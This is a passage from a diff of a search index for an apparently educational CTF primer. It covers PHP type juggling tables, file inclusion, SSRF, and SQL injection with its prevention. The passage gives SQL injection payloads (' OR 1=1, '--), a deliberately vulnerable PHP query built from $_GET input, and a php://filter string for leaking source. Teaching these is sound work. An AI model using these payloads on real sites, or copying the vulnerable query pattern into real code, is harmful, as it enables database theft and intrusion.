PHP will do just about anything to match with a loose comparison (\\=\\=) which means things can be 'equal' (\\=\\=) or really equal (\\=\\=\\=). The implicit integer parsing to strings is the root cause of a lot of issues in PHP.
"}, {"location": "web-exploitation/php/what-is-php/#type-comparison-table", "title": "Type Comparison Table", "text": ""}, {"location": "web-exploitation/php/what-is-php/#comparisons-of-x-with-php-functions", "title": "Comparisons of $x with PHP Functions", "text": "Expression gettype() empty() is_null() isset() boolean:if($x)
$x = \"\"; string TRUE FALSE TRUE FALSE $x = null; NULL TRUE TRUE FALSE FALSE var $x; NULL TRUE TRUE FALSE FALSE $x is undefined NULL TRUE TRUE FALSE FALSE $x = array(); array TRUE FALSE TRUE FALSE $x = array('a', 'b'); array FALSE FALSE TRUE TRUE $x = false; boolean TRUE FALSE TRUE FALSE $x = true; boolean FALSE FALSE TRUE TRUE $x = 1; integer FALSE FALSE TRUE TRUE $x = 42; integer FALSE FALSE TRUE TRUE $x = 0; integer TRUE FALSE TRUE FALSE $x = -1; integer FALSE FALSE TRUE TRUE $x = \"1\"; string FALSE FALSE TRUE TRUE $x = \"0\"; string TRUE FALSE TRUE FALSE $x = \"-1\"; string FALSE FALSE TRUE TRUE $x = \"php\"; string FALSE FALSE TRUE TRUE $x = \"true\"; string FALSE FALSE TRUE TRUE $x = \"false\"; string FALSE FALSE TRUE TRUE"}, {"location": "web-exploitation/php/what-is-php/#comparisons", "title": "\"==\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== 1 ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== -1 ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE \"1\" ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE ==TRUE== array() FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE FALSE \"php\" ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE=="}, {"location": "web-exploitation/php/what-is-php/#comparisons_1", "title": "\"===\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 1 FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE -1 FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE \"1\" FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE array() FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE \"php\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE=="}, {"location": "web-exploitation/php/what-is-php/#file-inclusion", "title": "File Inclusion", "text": "PHP has multiple ways to include other source files such as require, require_once and include. These can take a dynamic string such as require $_GET['page'] . \".php\";
which is usually seen in templating.
PHP has its own URL scheme: php://...
and its main purpose is to filter output automatically. It can automatically remove certain HTML tags and can base64 encode as well.
$fp = fopen('php://output', 'w');\nstream_filter_append(\n $fp,\n 'string.strip_tags',\n STREAM_FILTER_WRITE,\n array('b','i','u'));\nfwrite($fp, \"<b>bolded text</b> enlarged to a <h1>level 1 heading</h1>\\n\");\n/* <b>bolded text</b> enlarged to a level 1 heading */\n
"}, {"location": "web-exploitation/php/what-is-php/#exploitation", "title": "Exploitation", "text": "These filters can also be used on input such as:
php://filter/convert.base64-encode/resource={file}
include
, file_get_contents()
, etc. support URLs including PHP stream filter URLs (php://
)include
normally evaluates any PHP code (in tags) it finds, but if it\u2019s base64 encoded it can be used to leak sourceServer Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.
For example, say there is a website that lets you take a screenshot of any site on the internet.
Under normal usage a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost ? Or perhaps tries to access something more useful like http://localhost/server-status ?
Note
127.0.0.1 (also known as localhost or loopback) represents the computer itself. Accessing localhost means you are accessing the computer's own internal network. Developers often use localhost as a way to access the services they have running on their own computers.
Depending on what the response from the site is the attacker may be able to gain additional information about what's running on the computer itself.
In addition, the requests originating from the server would come from the server's IP not the attackers IP. Because of that, it is possible that the attacker might be able to access internal resources that he wouldn't normally be able to access.
Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/", "title": "SQL Injection", "text": "SQL Injection is a vulnerability where an application takes input from a user and doesn't vaildate that the user's input doesn't contain additional SQL.
<?php\n $username = $_GET['username']; // kchung\n $result = mysql_query(\"SELECT * FROM users WHERE username='$username'\");\n?>\n
If we look at the $username variable, under normal operation we might expect the username parameter to be a real username (e.g. kchung).
But a malicious user might submit different kind of data. For example, consider if the input was '
?
The application would crash because the resulting SQL query is incorrect.
SELECT * FROM users WHERE username='''\n
Note
Notice the extra single quote at the end.
With the knowledge that a single quote will cause an error in the application we can expand a little more on SQL Injection.
What if our input was ' OR 1=1
?
SELECT * FROM users WHERE username='' OR 1=1\n
1 is indeed equal to 1. This equates to true in SQL. If we reinterpret this the SQL statement is really saying
SELECT * FROM users WHERE username='' OR true\n
This will return every row in the table because each row that exists must be true.
We can also inject comments and termination characters like --
or /*
or ;
. This allows you to terminate SQL queries after your injected statements. For example '--
is a common SQL injection payload.
SELECT * FROM users WHERE username=''-- '\n
This payload sets the username parameter to an empty string to break out of the query and then adds a comment (--
) that effectively hides the second single quote.
Using this technique of adding SQL statements to an existing query we can force databases to return data that it was not meant to return.
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/#preventing-sql-injection", "title": "Preventing SQL Injection", "text": "The best way to prevent SQL Injection is to use prepared statements. Prepared statements are a way to execute SQL queries that separates the query logic from the data being passed into the query.
<?php\n $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username');\n $stmt->execute(['username' => $username]);\n?>\n
In this example, the :username
is a placeholder that is replaced with the value of the $username
variable. The database driver will automatically escape the value of $username
to prevent SQL Injection.
Another way to prevent SQL Injection is to use an ORM (Object Relational Mapping) library. ORM libraries abstract the database layer and allow you to interact with the database using objects instead of raw SQL queries.
<?php\n $user = User::where('username', $username)->first();\n?>\n
ORM libraries automatically escape user input to prevent SQL Injection.
"}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 4295c488..7de6d6ba 100644 Binary files a/sitemap.xml.gz and b/sitemap.xml.gz differ